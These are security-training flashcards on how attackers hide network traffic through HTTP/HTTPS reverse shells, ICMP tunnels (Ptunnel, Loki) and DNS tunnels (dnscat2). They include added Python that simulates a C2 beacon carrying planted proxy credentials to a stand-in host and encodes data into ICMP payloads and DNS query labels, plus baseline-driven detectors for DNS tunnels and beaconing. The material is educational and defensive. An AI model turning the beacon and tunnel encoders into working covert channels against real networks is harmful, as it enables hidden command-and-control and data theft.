Book 5: Covering Tracks on the Network Flashcards
What is the most common way for an attacker to hide information as it is transmitted across a network?
tunneling
pg 81 book 5
What is tunneling?
one protocol carried inside another protocol.
pg 81 book 5.
If tunneling is used, which protocol does the network see?
The network sees only the outer (carrier) protocol.
Example: "shell traffic inside ICMP packets". The network sees only the ICMP packets.
pg 81 book 5.
If the carrier protocol used to tunnel/transport the information is allowed to run, will the protocol inside it (such as shell traffic) also be able to traverse the network?
True.
pg 81 book 5
Tunnel sender side contains?
Tunnel receiver side contains?
Sender side: the information is placed into the tunnel (wrapped in the carrier protocol).
Receiver side: the envelope is opened and the information is removed from the tunnel.
pg 81 book 5
How can attackers evade detection?
By tunneling information. Tunneled traffic is more complex to evaluate and identify than traffic sent openly.
pg 81 book 5
What ways can an attacker tunnel data to evade detection and cover their tracks?
Tunneling via:
- Reverse HTTP/HTTPS shells
- ICMP tunnels: Ptunnel tool
- DNS tunnels: dnscat2 tool
- Blending in with the network's normal traffic
Would an attacker want to establish a backdoor using protocols that are common on the network? If so, give an example.
Yes.
Example: HTTP.
More:
1. Establish a backdoor using protocols that are common on the network.
2. Exploit a system and start some sort of command and control (C2) mechanism.
3. Once a system is compromised, the attacker needs to figure out which protocol to use for C2.
4. The compromised internal machine can be made to send HTTP requests out to the attacker's server (the C2 mechanism).
Reverse HTTP is done over both ___ and ___ HTTP channels.
insecure and secure
pg 82 book 5
How do reverse HTTP/HTTPS shells work?
At predetermined intervals, the HTTP program on the internal system reaches out across the Internet asking for commands from the attacker's external machine.
The attacker types commands at the external machine on the Internet, and they are sent back to the victim machine as HTTP responses.
Are you safe from reverse HTTP/HTTPS tunneling if you require HTTP authentication with static passwords?
No. Requiring HTTP authentication with static passwords to get out through your firewall does not make you safe.
Reverse HTTP shells allow the attacker to program the victim system with a user ID and password that will be given to the outgoing web proxy/firewall for authentication.
True.
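As an added worked example (not code from the book or from any particular reverse-shell tool), the following Python simulates the exchange described above end to end without touching the network: the victim-side beacon that carries a planted static proxy credential in a Proxy-Authorization header, the attacker-side HTTP response that carries the next command, and a jittered check-in interval. The C2 host, path and credentials are constructed values.

```python
import base64
import random
import re
from typing import Tuple

# Constructed values for this example: a hypothetical attacker C2 host and the
# static proxy credentials the attacker planted on the victim machine.
C2_HOST = "c2.example.test"
C2_PATH = "/update/check"
PROXY_USER = "jdoe"
PROXY_PASS = "Winter2024!"
BASE_INTERVAL_SECONDS = 60


def proxy_auth_header(user: str, password: str) -> str:
    """Static credentials in the form an authenticating web proxy expects.
    HTTP Basic is just base64(user:password); a program can send it as easily
    as a browser can, which is why static proxy passwords do not stop this."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Proxy-Authorization: Basic {token}"


def build_beacon(host: str, path: str, user: str, password: str, result: str = "") -> bytes:
    """Victim side: the outbound request that asks the attacker for a command.
    Output from the previous command rides along as a form field."""
    body = f"r={base64.b64encode(result.encode()).decode()}" if result else ""
    lines = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        proxy_auth_header(user, password),
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n" + body).encode()


def parse_beacon_result(raw_request: bytes) -> str:
    """Attacker side: recover the previous command's output from the beacon."""
    _head, _sep, body = raw_request.partition(b"\r\n\r\n")
    match = re.match(rb"r=([A-Za-z0-9+/=]+)$", body)
    return base64.b64decode(match.group(1)).decode() if match else ""


def build_command_response(command: str) -> bytes:
    """Attacker side: the next command goes back as an ordinary 200 OK body."""
    body = base64.b64encode(command.encode()).decode()
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/plain\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    ).encode()


def parse_command(raw_response: bytes) -> str:
    """Victim side: pull the command out of the HTTP response body.
    Anything but a 200 (e.g. a 407 from the proxy) yields no command."""
    head, _sep, body = raw_response.partition(b"\r\n\r\n")
    if not head.startswith(b"HTTP/1.1 200"):
        return ""
    return base64.b64decode(body).decode()


def next_check_in(base: float, jitter: float = 0.2, rng=random) -> float:
    """Seconds until the next beacon: the base interval plus random jitter so the
    check-ins are less obviously periodic in proxy logs."""
    return base * (1 + rng.uniform(-jitter, jitter))


def one_round(command: str, previous_result: str = "") -> Tuple[str, str]:
    """One beacon/response round trip, simulated without touching the network.
    Returns (command the victim extracted, result the attacker recovered)."""
    request = build_beacon(C2_HOST, C2_PATH, PROXY_USER, PROXY_PASS, previous_result)
    recovered = parse_beacon_result(request)    # attacker reads last output
    response = build_command_response(command)  # attacker queues next command
    return parse_command(response), recovered


if __name__ == "__main__":
    cmd, got = one_round("whoami", "uid=1000(svc)")
    print("victim will run:", cmd)
    print("attacker received:", got)
    print("next check-in in", round(next_check_in(BASE_INTERVAL_SECONDS), 1), "s")
```

The point to take from it: the proxy credential is nothing more than base64 of user:password, so any program on the host can present it, and what a defender sees through the proxy is a user account, a destination and a timing pattern, which is why the detection cards later on lean on baselines rather than on authentication.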
Name the tool that carries data inside the payloads of ICMP packets?
Ptunnel
What is Ptunnel?
ICMP tunneling tool that carries TCP connections inside ICMP Echo and ICMP Echo Reply packets.
Do a lot of networks allow outbound ICMP Echo packets and their associated responses?
Yes.
What is Loki?
A tool that carries a shell between its Linux client and Linux server software using ICMP Echo and Echo Reply packets.
What is ICMPShell?
A Linux shell tool that likewise rides on ICMP.
Ptunnel is best used on a network that blocks outbound __ and __ packets but allows you to ping arbitrary hosts on the Internet.
TCP and UDP.
Ptunnel consists of how many components?
Two: the Ptunnel client and the Ptunnel proxy.
Ptunnel proxy can be configured to authenticate the Ptunnel client using what kind of authentication algorithm?
MD5 based challenge/response
The Ptunnel client and the Ptunnel proxy are the two main components of ___ tunneling.
ICMP tunneling.
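Added example (not Ptunnel's source or its real wire format): a minimal Python model of the sender and receiver sides of an ICMP tunnel as described in the tunneling cards above and in the Ptunnel cards. A TCP byte stream is sliced into numbered ICMP Echo Request payloads with a valid RFC 1071 checksum; the proxy side filters on the session identifier, reorders by sequence number and reassembles the stream; and a simplified MD5 challenge/response (mirroring the scheme the cards attribute to Ptunnel) gates access to the proxy. The shared secret and session identifier are constructed for the example.

```python
import hashlib
import hmac
import os
import struct
from typing import Dict, List, Tuple

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

# Constructed for this example: a hypothetical shared secret between tunnel
# client and proxy. Ptunnel's real wire format and authentication exchange differ.
SHARED_SECRET = b"example-tunnel-secret"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Sender side of the tunnel: the payload goes in the echo data field.
    On the wire this is indistinguishable from a ping with an odd payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp(packet: bytes) -> Tuple[int, int, int, bytes]:
    """Receiver side: open the envelope. Returns (type, ident, seq, payload)."""
    if len(packet) < 8:
        raise ValueError("short ICMP packet")
    icmp_type, _code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_checksum(packet[:2] + b"\x00\x00" + packet[4:]) != csum:
        raise ValueError("bad ICMP checksum")
    return icmp_type, ident, seq, packet[8:]


def encapsulate_stream(data: bytes, ident: int, chunk: int = 64) -> List[bytes]:
    """Client side: slice a TCP byte stream into numbered Echo Requests, one
    chunk per ping. The ident field marks which tunnel session a ping belongs to."""
    return [
        build_icmp(ICMP_ECHO_REQUEST, ident, seq, data[i:i + chunk])
        for seq, i in enumerate(range(0, len(data), chunk))
    ]


def reassemble_stream(packets: List[bytes], ident: int, icmp_type: int = ICMP_ECHO_REQUEST) -> bytes:
    """Proxy side: keep only this session's pings, order by sequence number
    (ICMP gives no ordering guarantee) and rebuild the original stream."""
    chunks: Dict[int, bytes] = {}
    for pkt in packets:
        pkt_type, pkt_ident, seq, payload = parse_icmp(pkt)
        if pkt_type == icmp_type and pkt_ident == ident:
            chunks[seq] = payload
    return b"".join(chunks[s] for s in sorted(chunks))


def make_challenge() -> bytes:
    """Proxy side: a fresh random challenge per connecting client."""
    return os.urandom(16)


def challenge_response(challenge: bytes, secret: bytes) -> bytes:
    """Client side: prove knowledge of the secret without sending it.
    MD5(challenge || secret) mirrors the MD5-based scheme the flashcards describe
    for Ptunnel; a new design would use HMAC-SHA256 instead."""
    return hashlib.md5(challenge + secret).digest()


def proxy_accepts(challenge: bytes, response: bytes, secret: bytes) -> bool:
    """Proxy side: constant-time comparison against the expected response."""
    return hmac.compare_digest(response, challenge_response(challenge, secret))


if __name__ == "__main__":
    # Sender: an HTTP request that a firewall blocking TCP would never let out directly.
    stream = b"GET / HTTP/1.0\r\nHost: example.test\r\n\r\n"
    pings = encapsulate_stream(stream, ident=0x1234, chunk=16)
    print(f"{len(stream)} bytes became {len(pings)} Echo Requests")
    # Receiver: the proxy recovers the TCP payload and answers in Echo Replies.
    print(reassemble_stream(list(reversed(pings)), 0x1234) == stream)
    reply = build_icmp(ICMP_ECHO_REPLY, 0x1234, 0, b"HTTP/1.0 200 OK\r\n")
    print(parse_icmp(reply)[3])
```

Note that the checksum verification on the receiver is what a defender's IDS also has to do before it can look at the payload; a tunnel that keeps its ICMP well-formed survives any filter that only checks "is this a valid ping".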
What is the tool used for DNS tunneling?
dnscat2
DNS tunneling / dnscat2 is similar to what?
Netcat
How is DNS tunneling/dnscat2 similar to Netcat, and how does it differ?
Similar in that both give the attacker a channel to pass commands and data, but unlike Netcat, DNS tunneling does NOT talk directly to the attacker's server; instead it uses the victim's own network infrastructure (its DNS servers) to relay the malicious content, bypassing many different filtering mechanisms.
Netcat talks directly to the attacker server, while DNS tunneling talks to the victim's DNS servers, which then relay the malicious content?
True.
What would prevent an attacker from reaching a C2 system directly from inside the network?
Blocked egress ports and authentication-required HTTP proxies.
How does DNS tunneling work?
The compromised host does not talk directly to a DNS server on the Internet; instead it queries the internal DNS server, using crafted query data (encoded into the name being looked up). The internal DNS server resolves the name the normal way, starting at the root-level DNS servers on the Internet and following referrals down the hierarchy until the query reaches the attacker-controlled DNS server that is authoritative for the attacker's domain. That server extracts the crafted query data and performs an action on the attacker-supplied data.
Does DNS tunneling talk directly to a DNS server on the Internet?
No. It talks to the internal DNS server.
DNS tunneling Process victim –> ____ –> firewall –> root level DNS Server –> …. –> ____
Internal DNS server
Attacker Server
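Added example (not dnscat2's code or protocol): Python that builds the wire-format DNS queries a DNS tunnel hands to the victim's internal resolver, and the extraction the attacker's authoritative server performs when those queries arrive via the resolver hierarchy sketched above. Data is base32-encoded into labels under a hypothetical attacker zone (t.example.test, a constructed name), with a leading sequence label so out-of-order delivery can be repaired. Everything runs offline; no resolver is contacted.

```python
import base64
import struct
from typing import List, Tuple

# Constructed for this example: a hypothetical zone whose authoritative name
# server the attacker controls. Any resolver asked about a name under it ends
# up forwarding the question there, which is what makes the relay work.
TUNNEL_ZONE = "t.example.test"
QTYPE_TXT = 16
QCLASS_IN = 1
MAX_LABEL = 63            # RFC 1035 label length limit
MAX_NAME = 253            # RFC 1035 name length limit in presentation form
CHUNK_BYTES = 110         # 110 raw bytes -> 176 base32 chars -> 3 labels


def encode_chunk(seq: int, chunk: bytes, zone: str) -> str:
    """Victim side: hide a chunk of data in the labels of a query name.
    base32 keeps the labels inside DNS's case-insensitive letter/digit alphabet."""
    b32 = base64.b32encode(chunk).decode().lower().rstrip("=")
    labels = [f"{seq:08x}"] + [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join(labels + [zone])
    if len(name) > MAX_NAME:
        raise ValueError("query name too long; shrink CHUNK_BYTES or the zone")
    return name


def build_query(name: str, qid: int, qtype: int = QTYPE_TXT) -> bytes:
    """Wire-format DNS query: 12-byte header (RD set, one question), QNAME, QTYPE, QCLASS.
    This is exactly what the compromised host hands to the internal resolver."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, QCLASS_IN)


def tunnel_encode(data: bytes, zone: str = TUNNEL_ZONE, first_id: int = 0x1000) -> List[bytes]:
    """Turn a byte stream into a list of ordinary-looking TXT query packets."""
    return [
        build_query(encode_chunk(seq, data[i:i + CHUNK_BYTES], zone), first_id + seq)
        for seq, i in enumerate(range(0, len(data), CHUNK_BYTES))
    ]


def parse_query(packet: bytes) -> Tuple[int, str, int]:
    """Attacker's authoritative server side: returns (id, name, qtype)."""
    qid, _flags, qdcount = struct.unpack("!HHH", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        labels.append(packet[pos:pos + length].decode())
        pos += length
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return qid, ".".join(labels), qtype


def tunnel_decode(packets: List[bytes], zone: str = TUNNEL_ZONE) -> bytes:
    """Attacker side: ignore unrelated queries, pull the data labels out of ours,
    reorder by sequence (the resolver may deliver them out of order) and reassemble."""
    suffix = "." + zone
    chunks = {}
    for pkt in packets:
        _qid, name, _qtype = parse_query(pkt)
        if not name.endswith(suffix):
            continue
        seq_label, *data_labels = name[:-len(suffix)].split(".")
        b32 = "".join(data_labels).upper()
        chunks[int(seq_label, 16)] = base64.b32decode(b32 + "=" * (-len(b32) % 8))
    return b"".join(chunks[s] for s in sorted(chunks))


if __name__ == "__main__":
    secret = b"id=0(root) gid=0(root) groups=0(root)\n" * 4
    queries = tunnel_encode(secret)
    print(f"{len(secret)} bytes -> {len(queries)} queries, first name:")
    print(parse_query(queries[0])[1])
    print(tunnel_decode(queries) == secret)
```

The victim only ever sends these packets to its configured internal resolver; the resolver's own recursion carries them out through the firewall. That is also why the detection cards below focus on the shape and volume of the names rather than on the destination address.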
What is DNS?
Translates domain names to IP addresses so browsers can load internet resources.
Extra: how can DNS tunneling be detected?
Look for unusual data being sent back and forth, using statistical techniques: compare the number of DNS requests for a domain (and the length and shape of the query names) against the normal baseline.
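Added example of the statistical detection described above (constructed data, not from the book): a Python hunt over sample lines shaped like Zeek dns.log records. It summarizes each registered domain's query volume, distinct-subdomain ratio, mean name length, label entropy and TXT share, then compares against a constructed per-domain baseline. The registered-domain heuristic (last two labels) and the thresholds are simplifications to tune against your own data.

```python
import base64
import hashlib
import math
from collections import defaultdict
from typing import Dict, List


def _fake_tunnel_label(i: int) -> str:
    """Deterministic stand-in for base32-encoded tunnel data (constructed)."""
    return base64.b32encode(hashlib.sha256(str(i).encode()).digest()).decode().lower().rstrip("=")


# Constructed sample, shaped like Zeek dns.log fields: ts, uid, src, query, qtype.
# Six ordinary lookups of example.com plus twelve tunnel-style queries to t.example.test.
NORMAL_LINES = [
    "1700000000.10\tCk1a\t10.0.0.5\twww.example.com\tA",
    "1700000001.20\tCk1b\t10.0.0.5\tmail.example.com\tA",
    "1700000002.30\tCk1c\t10.0.0.7\twww.example.com\tA",
    "1700000003.40\tCk1d\t10.0.0.5\tupdate.example.com\tA",
    "1700000004.50\tCk1e\t10.0.0.7\tmail.example.com\tA",
    "1700000005.60\tCk1f\t10.0.0.9\twww.example.com\tA",
]
TUNNEL_LINES = [
    f"17000000{10 + i:02d}.00\tCk2{i:x}\t10.0.0.9\t{i:04x}.{_fake_tunnel_label(i)}.t.example.test\tTXT"
    for i in range(12)
]
SAMPLE_LOG = "\n".join(NORMAL_LINES + TUNNEL_LINES)

# Constructed baseline: what the previous week looked like per registered domain.
BASELINE = {
    "example.com": {"queries": 50, "mean_len": 17.0},
    "example.test": {"queries": 2, "mean_len": 16.0},
}


def parse_dns_log(text: str) -> List[dict]:
    records = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, uid, src, query, qtype = line.split("\t")
        records.append({"ts": float(ts), "uid": uid, "src": src, "query": query.lower(), "qtype": qtype})
    return records


def registered_domain(name: str) -> str:
    """Simplification: last two labels. Production code should use the Public Suffix List."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def summarize(records: List[dict]) -> Dict[str, dict]:
    """Per registered domain: volume, distinct subdomains, name length, entropy, TXT share."""
    groups = defaultdict(list)
    for r in records:
        groups[registered_domain(r["query"])].append(r)
    summary = {}
    for domain, recs in groups.items():
        subs = {r["query"][: -len(domain) - 1] for r in recs}
        summary[domain] = {
            "queries": len(recs),
            "unique_sub_ratio": len(subs) / len(recs),
            "mean_len": sum(len(r["query"]) for r in recs) / len(recs),
            "mean_entropy": sum(shannon_entropy(s) for s in subs) / len(subs),
            "txt_share": sum(r["qtype"] in ("TXT", "NULL") for r in recs) / len(recs),
        }
    return summary


def flag_tunnels(summary: Dict[str, dict], baseline: Dict[str, dict]) -> Dict[str, List[str]]:
    """Statistical tells: far more queries than usual, names much longer than usual,
    almost every query a never-before-seen subdomain, high-entropy labels, TXT-heavy."""
    flags = {}
    for domain, s in summary.items():
        base = baseline.get(domain, {"queries": 0, "mean_len": 20.0})
        reasons = []
        if s["queries"] > 3 * base["queries"] and s["queries"] >= 10:
            reasons.append(f"volume {s['queries']} vs baseline {base['queries']}")
        if s["mean_len"] > base["mean_len"] + 20:
            reasons.append(f"mean name length {s['mean_len']:.0f} vs baseline {base['mean_len']:.0f}")
        if s["unique_sub_ratio"] >= 0.8 and s["queries"] >= 10:
            reasons.append("nearly every query is a unique subdomain")
        if s["mean_entropy"] > 4.0 and s["txt_share"] > 0.5:
            reasons.append("high-entropy labels over TXT/NULL")
        if reasons:
            flags[domain] = reasons
    return flags


def hunt(text: str = SAMPLE_LOG, baseline: Dict[str, dict] = BASELINE) -> Dict[str, List[str]]:
    return flag_tunnels(summarize(parse_dns_log(text)), baseline)


if __name__ == "__main__":
    for domain, reasons in hunt().items():
        print(domain, "->", "; ".join(reasons))
```

Each reason is reported separately on purpose: a CDN or a cloud provider can legitimately generate many unique subdomains, so volume alone is a weak signal, while long, high-entropy names that mostly ask for TXT records at a domain the network has barely touched before is a combination few legitimate services produce.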
What is dnscat2?
A DNS tunnel that creates an encrypted C2 channel letting you upload/download files, run a shell, etc.
dnscat2 is an implementation of __ tunneling, consisting of an attacker process that partially implements the DNS server protocol and a ___ for Linux or Windows victims.
DNS
client
dnscat2 implements the DNS tunneling attack, providing __-like functionality over ___, while also providing __ and end-to-end transport encryption.
netcat
DNS.
authentication.
What can an attacker do when dnscat2 is successful?
Upload and download files, execute local system commands, set up new local listening ports for remote networking, etc.
Is dnscat2 a popular command and control (C2) mechanism, even though it is easy to spot?
True.
Other mechanisms used to exfiltrate data or establish C2?
Email, messaging tools, social media sites, cloud services, etc.
How can we prepare to protect our network?
Endpoint security tools, application whitelisting, UEBA tools.
Limit egress network protocol access; use authenticated proxy access for Internet resources instead of direct unauthenticated access.
A strong defense against C2 frameworks?
Using authenticated proxy access for Internet resources instead of direct unauthenticated access.
How can we identify attackers using tunneling?
Understand what our network and systems normally look like, so that we can perform threat hunting.
Spend time identifying which processes run on systems and what kind of network activity is "normal"; use that baseline for comparison.
React to unauthorized network egress access attempts.
A good technique for identifying tunneling is looking for anomalous network activity.
RITA - Real Intelligence Threat Analytics
What is RITA?
An open-source network traffic analysis framework that hunts for C2 behaviour in network logs, such as beaconing, unusually long connections and DNS tunneling.
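Added example (constructed data; not RITA's code or its scoring): the beacon-style anomaly check from the cards above, written in Python over sample lines shaped like an authenticating proxy's access log. It groups connections by source and destination and flags pairs with many connections whose inter-arrival times are too regular (low coefficient of variation) to be human browsing, reporting the proxy user account tied to them. The connection count and dispersion thresholds are assumptions to tune against your own baseline.

```python
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample, shaped like an authenticating proxy's access log:
# ts, src_ip, user, dest_host, bytes_out. One host checks in with c2.example.test
# roughly every 60 s with small jitter; another browses www.example.com irregularly.
BEACON_LINES = [
    f"{1700000000 + 60 * i + ((5 * i) % 7) - 3}\t10.0.0.9\tjdoe\tc2.example.test\t{512 + i % 3}"
    for i in range(20)
]
BROWSING_OFFSETS = [0, 5, 130, 131, 400, 1200, 1210, 2000, 2003, 3600, 3605, 5000]
BROWSING_LINES = [
    f"{1700000000 + off}\t10.0.0.5\tasmith\twww.example.com\t{900 + (37 * k) % 500}"
    for k, off in enumerate(BROWSING_OFFSETS)
]
SAMPLE_LOG = "\n".join(BEACON_LINES + BROWSING_LINES)


def parse_proxy_log(text: str) -> List[dict]:
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, user, dst, size = line.split("\t")
        records.append({"ts": int(ts), "src": src, "user": user, "dst": dst, "bytes": int(size)})
    return records


def coefficient_of_variation(values: List[float]) -> float:
    """stdev / mean: near 0 for a metronome, large for human-driven traffic."""
    mean = statistics.fmean(values)
    return statistics.pstdev(values) / mean if mean else float("inf")


def detect_beacons(records: List[dict], min_conns: int = 12, max_cv: float = 0.15) -> Dict[Tuple[str, str], dict]:
    """Group by (source, destination); flag pairs with many connections whose
    inter-arrival times are too regular to be a person clicking around."""
    pairs = defaultdict(list)
    for r in records:
        pairs[(r["src"], r["dst"])].append(r)
    beacons = {}
    for pair, recs in pairs.items():
        if len(recs) < min_conns:
            continue
        recs.sort(key=lambda r: r["ts"])
        intervals = [b["ts"] - a["ts"] for a, b in zip(recs, recs[1:])]
        cv = coefficient_of_variation(intervals)
        if cv <= max_cv:
            beacons[pair] = {
                "count": len(recs),
                "mean_interval": statistics.fmean(intervals),
                "interval_cv": cv,
                "size_cv": coefficient_of_variation([r["bytes"] for r in recs]),
                "users": sorted({r["user"] for r in recs}),
            }
    return beacons


def hunt(text: str = SAMPLE_LOG) -> Dict[Tuple[str, str], dict]:
    return detect_beacons(parse_proxy_log(text))


if __name__ == "__main__":
    for (src, dst), info in hunt().items():
        print(f"{src} -> {dst}: {info['count']} conns every ~{info['mean_interval']:.0f}s "
              f"(interval CV {info['interval_cv']:.2f}), proxy user(s) {info['users']}")
```

This is also where the authenticated-proxy defense pays off on the detection side: the beacon shows up attributed to a user account, so the hunt leads straight to the machine and credential the attacker planted rather than to an anonymous internal address.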
Are IDSs a useful technique for detecting C2 and exfiltration techniques?
No. They lack insight into encrypted streams and blended protocols.